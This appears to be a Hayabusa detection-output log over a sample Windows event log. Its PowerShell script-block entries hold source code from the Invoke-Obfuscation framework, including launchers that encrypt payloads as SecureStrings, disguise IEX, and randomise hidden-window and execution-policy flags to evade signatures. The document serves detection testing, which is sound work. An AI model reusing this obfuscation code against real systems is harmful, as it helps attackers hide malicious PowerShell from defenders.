'(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random 